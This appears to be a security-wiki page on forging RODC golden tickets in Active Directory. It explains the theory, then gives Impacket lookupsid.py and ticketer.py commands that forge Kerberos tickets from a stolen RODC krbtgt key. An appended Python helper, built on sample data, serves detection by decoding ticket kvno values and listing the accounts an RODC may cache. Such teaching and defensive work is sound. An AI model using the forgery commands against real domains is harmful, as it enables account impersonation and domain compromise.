RODC Golden tickets
Theory
With administrative access to an RODC, it is possible to dump all the credentials it has cached, including those of the krbtgt_XXXXX account (the RODC-specific krbtgt). Its hash can be used to forge an "RODC golden ticket" for any account that is in the RODC's msDS-RevealOnDemandGroup attribute and not in its msDS-NeverRevealGroup attribute. This ticket can be presented to the RODC itself, or to any reachable standard (writable) Domain Controller, to request a Service Ticket (ST).
When presenting an RODC golden ticket to a writable (i.e. standard) Domain Controller, there is no point in crafting a detailed PAC: the writable Domain Controller recalculates it when issuing the service ticket (ST).
Practice
At the time of writing, 15th Apr. 2026, the pull request adding the -rodcNo flag in ticketer.py is pending.
There are Impacket scripts for each step of the golden ticket creation: retrieving the domain SID, then creating the RODC golden ticket.
# Find the domain SID
lookupsid.py -hashes "ffffffffffffffffffffffffffffffff:$NT_HASH" "$DOMAIN/$USER@$DC_HOST" 0
# Create the RODC golden ticket (with an RC4 key, i.e. NT hash)
ticketer.py -nthash "$KRBTGT_NT_HASH" -domain-sid "$DOMAIN_SID" -domain "$DOMAIN" -rodcNo "$RODC_NUMBER" $USER
# Create the RODC golden ticket (with an AES 128/256bits key)
ticketer.py -aesKey "$KRBTGT_AES_KEY" -domain-sid "$DOMAIN_SID" -domain "$DOMAIN" -rodcNo "$RODC_NUMBER" $USER
# Create the RODC golden ticket (with an RC4 key, i.e. NT hash) with custom user/groups ids
ticketer.py -nthash "$KRBTGT_NT_HASH" -domain-sid "$DOMAIN_SID" -domain "$DOMAIN" -rodcNo "$RODC_NUMBER" -user-id "$USER_RID" -groups "$GROUPID1,$GROUPID2,..." $USER

The secret ingredient for making an RODC golden ticket viable is including the correct key version number in the kvno field of the ticket.
(Elad Shamir on specterops.io)
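The following is an added example, not code from the page, from Impacket or from the quoted article. It gives an investigator two checks that follow from the text above: decoding the kvno of a ticket to tell whether it was issued under an RODC's krbtgt_XXXXX key (and which RODC), and listing which accounts an RODC is allowed to cache, i.e. members of msDS-RevealOnDemandGroup minus members of msDS-NeverRevealGroup. It assumes the kvno layout documented in MS-KILE (RODC identifier in the upper 16 bits, key version in the lower 16 bits); the group names, account names and memberships are constructed sample data, not real directory output.

```python
"""Defender-side helpers for RODC krbtgt investigations (added example)."""
from dataclasses import dataclass


@dataclass(frozen=True)
class KvnoInfo:
    rodc_id: int       # 0 for a ticket signed with a writable DC's krbtgt key
    key_version: int   # the actual version of the key in use
    is_rodc: bool


def decode_kvno(kvno: int) -> KvnoInfo:
    """Split a 32-bit kvno into RODC identifier and key version.

    Assumption (MS-KILE): when an RODC's krbtgt_XXXXX key is used, the upper
    16 bits of the kvno carry the RODC identifier (the XXXXX number) and the
    lower 16 bits carry the key version. A kvno below 65536 therefore means
    the ticket was issued under the domain's normal krbtgt key.
    """
    if not 0 <= kvno <= 0xFFFFFFFF:
        raise ValueError("kvno must fit in 32 bits")
    rodc_id = (kvno >> 16) & 0xFFFF
    key_version = kvno & 0xFFFF
    return KvnoInfo(rodc_id=rodc_id, key_version=key_version, is_rodc=rodc_id != 0)


def rodc_krbtgt_name(rodc_id: int) -> str:
    """Name of the RODC-specific krbtgt account for a decoded RODC identifier."""
    return f"krbtgt_{rodc_id}"


def revealable_accounts(reveal_on_demand, never_reveal, members):
    """Accounts an RODC may cache, per the rule stated on the page.

    reveal_on_demand / never_reveal: group names taken from the RODC's
    msDS-RevealOnDemandGroup and msDS-NeverRevealGroup attributes.
    members: flattened membership, mapping group name -> set of sAMAccountNames.
    Deny wins: anything in a never-reveal group is excluded.
    """
    allowed = set()
    for group in reveal_on_demand:
        allowed |= members.get(group, set())
    denied = set()
    for group in never_reveal:
        denied |= members.get(group, set())
    return sorted(allowed - denied)


# Constructed sample directory snapshot (not real data).
SAMPLE_REVEAL_ON_DEMAND = ["Allowed RODC Password Replication Group", "Branch-Users"]
SAMPLE_NEVER_REVEAL = ["Denied RODC Password Replication Group", "Domain Admins"]
SAMPLE_MEMBERS = {
    "Allowed RODC Password Replication Group": {"alice", "bob", "branch-svc"},
    "Branch-Users": {"carol", "dave"},
    "Denied RODC Password Replication Group": {"dave", "krbtgt"},
    "Domain Admins": {"bob", "administrator"},
}


def audit_sample():
    """Run both checks on the constructed sample; returns the findings."""
    # Constructed kvno: RODC identifier 35011, key version 2.
    ticket_kvno = (35011 << 16) | 2
    info = decode_kvno(ticket_kvno)
    exposed = revealable_accounts(SAMPLE_REVEAL_ON_DEMAND, SAMPLE_NEVER_REVEAL, SAMPLE_MEMBERS)
    return {
        "kvno": ticket_kvno,
        "issued_by_rodc": info.is_rodc,
        "rodc_krbtgt": rodc_krbtgt_name(info.rodc_id) if info.is_rodc else "krbtgt",
        "key_version": info.key_version,
        "accounts_at_risk": exposed,
    }


if __name__ == "__main__":
    for key, value in audit_sample().items():
        print(f"{key}: {value}")
```

Reading the kvno this way is useful when triaging a suspicious ticket: a kvno above 65535 identifies which RODC's key signed it, which narrows the scope of a krbtgt_XXXXX reset. The account list is the blast radius of that RODC's cached secrets; accounts in a deny group (here `bob` and `dave`) are excluded even though they also appear in an allow group.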